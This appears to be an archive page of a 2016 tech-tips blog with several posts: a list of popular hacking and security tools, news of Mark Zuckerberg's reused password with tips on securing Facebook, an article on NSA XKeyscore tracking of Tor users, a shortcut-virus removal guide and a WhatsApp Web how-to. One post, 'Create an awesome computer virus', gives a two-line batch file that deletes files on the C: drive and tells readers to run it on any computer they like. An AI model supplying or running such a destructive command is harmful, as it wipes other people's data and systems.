Showing posts with label tricks and tips. Show all posts
Showing posts with label tricks and tips. Show all posts

Wednesday, 8 June 2016

Top 10 Hacking Tools Of 2016



A hacking tool is a program designed to assist with hacking, or a piece of software which can be used for hacking purposes. Examples include Nmap, Nessus, John the Ripper, p0f, and Winzapper.

Here are the Top Best Ethical Hacking Tools 2016:


1 Metasploit 



Metaspoit: Best Hacking Tools of 2016 


Metasploit is available for all major platforms including Windows, Linux, and OS X. Rather than calling Metasploit a collection of exploit tools, I like to call it an infrastructure that you can utilize to build your own custom tools. This free tool is one of the most popular cyber security tools around that allows you to locate vulnerabilities at different platforms. Metasploit is backed by more than 200,000 users and contributors that help you to get insights and uncover the weaknesses in your system. 

This top hacking tool package of 2016 lets you simulate real-world attacks to tell you about the weak points and finds them. As a penetration tester, it pin points the vulnerabilities with Nexpose closed–loop integration using Top Remediation reports. Using the open source Metasploit framework, users can build their own tools and take the best out of this multi-purpose hacking tool.

2 Nmap



Nmap is available for all major platforms including Windows, Linux, and OS X. I think everyone has heard of this one, Nmap (Network Mapper) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts.Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use,and dozens of other characteristics. It may be used to discover computers and services on a computer network, thus creating a “map” of the network.Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.Can be used by beginners (-sT) or by pros alike (packet_trace). Nmap can be a very versatile tool, once you fully understand the results.

3 Acunetix WVS 


Acunetix is available for Windows XP and higher. Acunetix is a web vulnerability scanner (WVS) that scans and finds out the flaws in a website that could prove fatal. This multi-threaded tool crawls a website and finds out malicious Cross-site Scripting, SQL injection, and other vulnerabilities. This fast and easy to use tool scans WordPress websites form more than 1200 vulnerabilities in WordPress.
Acunetix comes with a Login Sequence Recorder that allows one to access the password protected areas of websites. The new AcuSensor technology used in this tool allows you to reduce the false positive rate. Such features have made Acunetix WVS a preferred hacking tools that you need to check out in 2016.

4 Wireshark 


This free and open source tool was originally named Ethereal. Wireshark also comes in a command-line version called TShark. This GTK+-based network protocol analyzer runs with ease on Linux, Windows, and OS X. Wireshark is a GTK+-based Wiresharknetwork protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.It works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams. 

5 oclHashcat 


This useful hacking tool can be downloaded in different versions for Linux, OSX, and Windows. If password cracking is something you do on daily basis, you might be aware of the free password cracking tool Hashcat. While Hashcat is a CPU-based password cracking tool, oclHashcat is its advanced version that uses the power of your GPU.
oclHashcat calls itself world’s fastest password cracking tool with world’s first and only GPGPU based engine. For using the tool, NVIDIA users require ForceWare 346.59 or later and AMD users require Catalyst 15.7 or later.

This tool employs following attack modes for cracking:
  • Straight 
  • Combination 
  • Brute-force 
  • Hybrid dictionary + mask 
  • Hybrid mask + dictionary 
Mentioning another major feature, oclHashcat is an open source tool under MIT license that allows an easy integration or packaging of the common Linux distros.

6 Nessus Vulnerability Scanner 


Nessus is supported by a variety of platforms including Windows 7 and 8, Mac OS X, and popular Linux distros like Debian, Ubuntu, Kali Linux etc. This top free hacking tool of 2016 works with the help of a client-server framework. Developed by Tenable Network Security, the tool is one of the most popular vulnerability scanners we have. Nessus serves different purposes to different types of users – Nessus Home, Nessus Professional, Nessus Manager and Nessus Cloud. 

Using Nessus, one can scan multiple types of vulnerabilities that include remote access flaw detection, misconfiguration alert, denial of services against TCP/IP stack, preparation of PCI DSS audits, malware detection, sensitive data searches etc. To launch a dictionary attack, Nessus can also call a popular tool Hydra externally.
Apart from the above mentioned basic functionalities, Nessus could be used to scan multiple networks on IPv4, IPv6 and hybrid networks. You can set scheduled scan to run at your chosen time and re-scan all or a subsection of previously scanned hosts using selective host re-scanning.

7 Maltego



Maltego hacking tool is available for Windows, Mac, and Linux. Maltego is an open source forensics platform that offers rigorous mining and information gathering to paint a picture of cyber threats around you. Maltego excels in showing the complexity and severity of points of failure in your infrastructure and the surrounding environment. 

Maltego is a great hacker tool that analyzes the real world links between people, companies, websites, domains, DNS names, IP addresses, documents and whatnot. Based on Java, this tool runs in an easy-to-use graphical interface with lost customization options while scanning. 


8 Social-Engineer Toolkit 




Apart from Linux, Social-Engineer Toolkit is partially supported on Mac OS X and Windows. Also featured on Mr. Robot, TrustedSec’s Social-Engineer Toolkit is an advanced framework for simulating multiple types of social engineering attacks like credential harvestings, phishing attacks, and more.  

This Python-driven tool is the standard tool for social-engineering penetration tests with more than two million downloads. It automates the attacks and generates disguising emails, malicious web pages and more. 

To download SET on Linux, type the following command:

git clone https://github.com/trustedsec/social-engineer-toolkit/ set/

9 Nessus Remote Security Scanner 





Recently went closed source, but is still essentially free. Works with a client-server framework. Nessus Remote Security Scanner is the worlds most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the worlds largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications. 

10 Kismet 




Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with Kismetany wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic. A good wireless tool as long as your card supports rfmon.

Tuesday, 7 June 2016

Hackers everywhere!!! Zuckerberg’s social media accounts hacked!!! Learn how to protect your's


"Hackers, hackers everywhere,social media is safe no more!".

Facebook CEO Mark Zuckerberg would be one person you’d think would use good security to protect social media accounts. Apparently,even billionaire tech entrepreneurs get hacked.

Facebook Inc.’s first “security tip” for users is, “Don’t use your Facebook password anywhere else online.”

But, its founder did not heed that advice.


Mr. Zuckerberg’s Twitter Inc. and Pinterest Inc. accounts were taken over on Sunday because he reused a password: “dadada”. The password had appeared last month in a database of more than 100 million usernames and passwords stolen in 2012 from LinkedIn Corp. Mr. Zuckerberg appears to have reused “dadada” to log into Twitter and Pinterest, allowing hackers to take over those accounts. 

The hacker group OurMine took responsibility, and claimed they were just trying to raise awareness.



How hackers hack Facebook Account

Inorder to learn how to protect your social media acoounts you must first understand how hackers hack ocial media acoounts

Email Address Hack


For email address hack, all a hacker needs to do is know your name and he will be conveniently shown your email address at your Facebook profile. Then hacker's can hack your Facebook account (and everything else associated with that email id) if he 'guesses' your password (if you use a weak password) or answers your security question! This is something I hope Facebook improves on quickly.




Phishing

Phishing is one of the easiest ways to trick users into giving out their login credentials. All a hacker does is setup a webpage similar in design to that of the Facebook homepage, attach a server sided script to track the username and password entered and store it in a log. Sending people emails stating that someone tagged a photo of them on Facebook in the same format as Facebook and giving a link below to the phishing website further reduces the chances of it being detected as a fake. Sometimes, spam Facebook apps, like those promising to tell who viewed your Facebook profile, automatically post links to phishing websites. A new trend amongst phishers is creating Facebook look-a-like widgets for stealing user's login credentials.

Key logging through Keyloggers

Keylogger is a type of computer virus that tracks key strokes. Keyloggers can be installed remotely on a computer system by a cracker to record all the activity that is going on the victim's computer. Keylogging gets more easy if the hacker has physical access to the victim's computer.

Social Engineering

Social engineering involves using any trick to fool the user into making himself vulnerable to exploits. This could involve anything from sending spoof emails, pretending to be from Facebook, telling you to change your password to 12345678 to a hacker maliciously getting out the answer to your security question in a friendly chat or discussion.



Now the question is "How to prevent your Facebook Account from being Hacked?"

Following Three Security Options makes your Facebook Account Secure and Hack Proof.

1.You can enable Login Notification so that whenever any body (or a hacker) tries to login with your User ID and Password, you will receive a Notification on your cell phone and you will come to know that it's time to change your password right now because the hacker has got your password and is trying to log in to your Facebook Account.

To Enable Login Nofication
Go to Home -> Account Settings -> Security -> Login Notification

Put a Check Mark on your preffered option and

click Save Changes button.


2.Always check your Active Sessions. If you notice any unfamiliar location or device, it means your Facebook Account is at risk. Just click on End Activity and dont forget to change your password after that.

To Check Active Sessions
Go to Home -> Account Settings -> Security -> Active Sessions.

3.Enable Secure Browsing to make your account more secure.
Go to Home-> Account Settings -> Security -> Secure Browsing.


Sources: Google,CNBC.com,bgr.com

The NSA will spy on you for reading this article


Are you looking for ways to protect your privacy while browsing the web? Are you trying to learn how to use Tor, the browser that anonymize your Internet traffic? Are you interested in ditching Windows for something that’s more privacy-friendly? The good news is that there are ways to do that. The bad news is that this sort of online behavior apparently triggers NSA spying, especially if you’re a foreigner.

A report from German site Tagesshau reveals that the NSA has a computer system dedicated to accessing Tor called XKeyscore. The NSA apparently digs for “deep-packet inspection” Internet users located outside of U.S., Canada, the U.K. and other countries that comprise the Five Eyes countries that work with the NSA on surveillance programs.


Hating Windows is apparently another infraction that will get you on the short list, especially if you’re looking to install the Tails operating system, which is generally used by people looking to guard their privacy.

Reporting on Tagesshau’s findings, Boing Boing speculates that the NSA and its partners might be using these simple mass surveillance spying practices to divide Internet users into two principal categories: Those who don’t care about guarding their privacy online, and those who use services like Tor, Tails and others.

It appears that even looking for information about Tor and Tails – and potentially reading this post – will get you fingerprinted.


The NSA’s intention here was to separate the sheep from the goats – to split the entire population of the Internet into ‘people who have the technical know-how to be private’ and ‘people who don’t’ and then capture all the communications from the first group,” the site continues. 



It’s believed that details about this NSA operation may come from a second source other than Snowden, although it’s not clear who that person is. 

Even though it might sound scary to the regular user looking for online data protection, the NSA’s thinking isn’t illogical. It makes perfect sense to want to know who’s looking to hide their online activity behind things like Tor and Tails because some of the people who do it are indeed up to no good. They’re not reporters looking to protect their sources, and they’re not living in oppressed countries. Some of them are the bad guys the NSA is trying to catch, and bad guys will almost certainly want to protect all online activity with the help of these encrypted technologies.


The investigation discloses the following:
  • Two servers in Germany - in Berlin and Nuremberg - are under surveillance by the NSA. 
  • Merely searching the web for the privacy-enhancing software tools outlined in the XKeyscore rules causes the NSA to mark and track the IP address of the person doing the search. Not only are German privacy software users tracked, but the source code shows that privacy software users worldwide are tracked by the NSA. 
  • Among the NSA's targets is the Tor network funded primarily by the US government to aid democracy advocates in authoritarian states. 
  • The XKeyscore rules reveal that the NSA tracks all connections to a server that hosts part of an anonymous email service at the MIT Computer Science and Artificial Intelligence Laboratory (CSAIL) in Cambridge, Massachusetts. It also records details about visits to a popular internet journal for Linux operating system users called "the Linux Journal - the Original Magazine of the Linux Community", and calls it 
    an "extremist forum".
























sorces:

bgr.com, Das Erste, Boing Boing, Google



Monday, 6 June 2016

Create an awesome computer virus in seconds( C-Drive TERMINATOR)!!!


Have you ever wondered how these computer geeks and hackers make these cool programs called computer virus?

A virus is a small but insidious piece of programming-code that attacks computer and network systems through 'contaminated' (infected) data files, introduced into a system via disks or internet. 

Do you know that you can create a virus in notepad !!!


Now I am going to show you how to create a virus that terminates an entire drive form the computer.



WARNING

Do not test this on your own computer or all your system files will be deleted and the system will fail to boot.


STEPS

1. Open notepad.(go to start--->Search--->Notepad)


2.Type the following command in notepad:

@echo off
Del C:\ *.* /y


3. Save this file as 'virus.bat' in your desktop or any other place.

Your C terminator virus is armed and ready for attack.

4. Run it on any computer you like.

NOTE
  • You can use any name as you want for your virus file.
  • Don't forget to save in .bat format.
  • The virus becomes active on double-click(Don't Run it on your computer. You will not be able to recover anything lost from the terminated drive and the OS will crash/fail to boot).

Wednesday, 1 June 2016

Manually Remove Virus From PC,USB or Memory Card using a simple command;Say bye bye to antivirus

Computer Virus infection is only removed through antivirus programs as you know, but this time we are talking about Shortcut Virus which is a new modern virus that automatically sneeks into your computer/USB/SD card and convert your content into a shortcut. 



  • Sometimes this virus will hide all your contents. 
  • Another irritating thing is that the short cut virus cannot be removed by most of the anti-virus programs available in market.
  • The only way to remove the virus was to format the entire partition or memory device.


BUT NOW THERE IS A WAY !!! 

Follow these steps to get rid of shortcut virus forever:

Step 1: Connect the affected device(Pen drive,memory card etc) to your PC/laptop.


Step 2: Open run (press windows button + R ). Then type in " cmd " in Run and press enter or OK to open command prompt.



Step 3: Go to My computer and check out the drive letter of your infected device or drive. 

As you can see mine is 'F'
Step 4:Now to remove shortcut virus from pendrive type "attrib -h -r -s /s /d f:\*.*" in the Command prompt.

Important

Replace " f " in the above cmd entry with the drive letter of your affected device.

Step 5: Press Enter button.

Step 6: Open your device(Pendrive,memory card etc). You would see both your original files and shortcut files.
Delete all the shortcut and unknown files.
Copy your original files and folders to another drive.

Step 7: Finally format the Pen drive or Memory card. 


You have successfully removed shortcut virus from pendrive and recovered the infected files in the device.

Tips to protect your pen drive from Virus


  • Keep your system up to date with the latest antivirus.
  • Update your antivirus program at regularly.
  • Do not ever open the shortcut or virus file with the extension filename.lnk. It could badly harm your computer and could infect your other removable devices too.
  • Before opening any removable drive ( pen drive or SD card ) perform a deep scan of the removable device.



Leave your valuable comments and if you find any difficulty in removing shortcut virus tell us, we will help you.






You can now use Watsapp in Google Chrome browser!!!! ...SEE HOW ?

We all Know that we Can Use Whatsapp on our Windows PC using Android Emulators like Bluestacks. That is an old story Right? But Now you can Use Your favorite Messaging app on your Google Chrome Browser too. Lately we have seen many updates in Whatsapp like 2 blue Ticks that shows read receipt. 





This time Watsapp have announced that Whatsapp will be available as Web Client for Google Chrome Users.

So, you guys might be wondering how!!!!

Before moving on to the steps let us first have a look at things you will need.

REQUIREMENTS

  • Latest Version of whatsapp installed in your Android.
  • Google Chrome Browser Installed on your PC.
  • Internet Connection in your Phone & PC.

If you have setup all the above mentioned requirements, follow the instructions given below.


Step 1: Click Here or Copy pastethis URL https://web.whatsapp.com in the address bar of your Chrome browser and hit Enter.



Step 2: You will see QR Code which you will have to Scan from your Phone, So open Whatsapp on your Android, Go to Menu > Whatsapp Web and Scan that QR Code on your Computer Screen. If you don’t see Whatsapp Web option then you need to Update your Whatsapp.



Step 3: Thats it you just need to Scan that QR Code to pair Whatsapp on your Phone and Whatsapp Web Client. If everything goes Right, then now you will be able to see your Messages on your Web Client in Google Chrome.


note
  • Remember to have Upto Date Version of WhatsApp on your Phone and also Keep in mind that your phone needs to be connected to internet in order to send and receive messages in your Web Client.
  • if you are a Firefox user, then you might just want to use Google Chrome to use Whatsapp in Google Chrome Browser. Likewise, IOS users will also not be able to use the Web client.
Before you Go

I would like to Share Couple of Pro tips that will make your experience better of using Whatsapp in Google Chrome.
Pro Tip 1: Make a Desktop application of Whatsapp Web. Simply Go to https://web.whatsapp.com , Then Click on 3 lines which are at right top corner of your Browser which says Customize and Control Google Chrome.

Now Scroll down and hover your mouse on More tools then Click on Create Application Shortcuts, a pop up will ask you where you want to store it on Desktop or Start menu or both. Select any of your Choice and Click on Create.

Pro Tip 2: Pin the Web Client tab in your Chrome, Again just go to https://web.whatsapp.com, Once loaded, Right click on that tab and select “Pin Tab”, now that tab will be pinned to extreme left of your Computer Screen. You will also be able to see Notification Bubble on that pinned tab whenever you receive a new Message.
To unpin the tab, just right click on it again and click on Unpin the tab.

So that is it for now, You learned how to Use Whatsapp in Google Chrome using Whatsapp web Client and Couple of Pro tip which i hope you will like it. So let me know what do you think about this update by whatsapp in the Comments below.